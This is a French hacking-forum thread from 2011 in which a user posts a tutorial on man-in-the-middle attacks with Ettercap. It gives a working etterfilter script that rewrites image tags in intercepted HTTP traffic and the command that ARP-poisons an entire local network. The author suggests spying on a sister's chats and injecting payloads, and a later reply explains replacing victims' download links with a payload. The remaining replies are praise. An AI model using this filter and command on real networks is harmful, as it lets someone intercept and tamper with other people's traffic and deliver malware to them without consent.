Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-06-2011 08:59:41

rcv1337
Membre Actif
Inscription : 15-06-2011
Messages : 37

Ettercap & EtterFilter.

Bonjour !

Notre but: mettre en place un filtre Ettercap afin de filtrer les packets lors de notre MITM.
Pourquoi ? Pour, par exemple, remplacer les "img src" d'un code HTML pour notre lien d'image.
Pour s'amuser avec les conversations de la soeur (msn, chat FB).
Pour injecter un payload wink
Etc.

Ici, nous allons seulement changer les images d'un site web en modifiant la balise img src du code HTML.


Étape 1 : Création du filtre

Créé un fichier et nommer le test1.filter

Voici le code à inséré dans celui-ci:

if (ip.proto == TCP && tcp.src == 80) {

   replace("img src=", "img src=\"http://votreimage.jpg\" ");

   replace("IMG SRC=", "img src=\"http://votreimage.jpg\" ");

   msg("Remplacé.\n");

}

Il veut dire quoi ce code ?
En gros, il intercepte tout ce qui passe par le TCP, via le port 80 (HTTP).
Ensuite, il remplace le mon clé "img src" & "IMG SRC" pour "img src=\"http://votreimage.jpg\"
Et puis, il nous imprime "Remplacé" dans la console OU dans ettercap-gtk (cependant ici nous allons utiliser ettercap via la console que.. j'affectionne particulièrement (=  ).

Maintenant faut compiler le code, pour terminer notre filtre.
Nous allons utiliser Etterfilter.

En console, aller dans le répertoire présent du fichier "test1.filter".
Voici la commande:

etterfilter -o test1.ef test1.filter

-o est le nom du fichier de sorti, puis ensuite le nom du fichier filtre, ici "test1.filter".

Un petit ls nous indique que le fichier à bien été créé wink
4wiBI.png

Votre filtre est donc terminé. Maintenant, l'utilisation.


Étape 2 : L'utilisation

Il faut d'abord commencer par déplacer le filtre dans le bon dossier. Il s'agit du dossier ettercap dans
/usr/share/ettercap

Une fois fais, on passe à l'attaque. Nous allons faire MITN(
Arp Poisoning) et charger notre filtre.

En console:

ettercap -i eth0 -T -q -F /usr/share/ettercap/test1.ef -M ARP // //

-i : Votre interface
-T: Texte seulement
-q: Un peut de silence, raconte pas ta vie
-F: Sa nous concerne, cette option nous permet de loader notre filtre.
-M: L'attaque ARP poisoning sous tout le réseau.

On lance puis..
sg5x8.png

Done smile

Simple ici mais cette technique peut être bien dangereuse.

Dernière modification par rcv1337 (16-06-2011 05:15:10)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-06-2011 18:47:06

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Ettercap & EtterFilter.

Bienvenue chez nous rcv1337 pour un premier post tu nous gates avec un bon petit tuto, moi je dis chapeau monsieur wink

Hors Ligne

#3 15-06-2011 18:59:37

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Ettercap & EtterFilter.

Joli tuto, merci et bienvenu wink


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#4 16-06-2011 06:12:07

rcv1337
Membre Actif
Inscription : 15-06-2011
Messages : 37

Re : Ettercap & EtterFilter.

Merci à vous. smile

Rien de bien compliqué, c'était pour "quick starter" mon activité sur le forum.

Hors Ligne

#5 16-06-2011 06:21:24

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Ettercap & EtterFilter.

Les pis m'en tombent smile, merci pour ta contribution.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#6 17-06-2011 19:45:23

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Ettercap & EtterFilter.

Super  Tuto ! Bravo ! wink
Juste je me demandais ce que tu voulais dire pas injecter une payload; La faire télécharger a la place d'un autre fichier ?

Hors Ligne

#7 17-06-2011 23:20:19

rcv1337
Membre Actif
Inscription : 15-06-2011
Messages : 37

Re : Ettercap & EtterFilter.

Exactement Lucas021, lorsque l'utilisateur sur le WLAN download un fichier, on remplace le lien du fichier source wink

@noireaude: C'est rien smile

Dernière modification par rcv1337 (17-06-2011 23:25:46)

Hors Ligne

#8 18-06-2011 19:39:12

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Ettercap & EtterFilter.

D'accord merci,
faudra que j'essaye , sa à l'air intéressant wink

Hors Ligne

#9 19-06-2011 17:59:38

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Ettercap & EtterFilter.

Merci pour le tuto wink


fete.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
20 237 10-11-2016 12:54:26 par koala
2 532 27-10-2015 00:21:23 par zoz25
1 909 15-03-2014 08:57:27 par Furyo
MITM Ettercap HTTPS ? par Endless-Hacking
2 1196 12-08-2013 13:24:07 par Volkow
8 1297 30-07-2013 21:25:24 par Speedfan

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]